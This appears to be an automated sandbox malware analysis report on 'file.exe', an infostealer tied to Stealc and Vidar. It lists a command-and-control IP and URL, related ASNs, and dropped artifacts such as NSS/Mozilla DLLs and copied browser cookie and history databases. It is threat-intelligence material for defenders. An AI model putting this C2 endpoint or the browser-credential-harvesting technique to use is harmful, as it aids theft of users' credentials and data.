Classification:	mal100.troj.spyw.evad.winEXE@1/21@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 76 Number of non-executed functions: 61
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, DarkTortilla	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AAEBAKKJKKEBKFIDBFBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFHDAEGHDGDBGDGDAAFI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKECBAKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAKKJKKECFIDGDHIJEGDAKFBFB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBFBKFIDHIDGHJKFBGHCFIEHJD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGHCAKKEGCAAFHJJJDBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KFBGCAKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
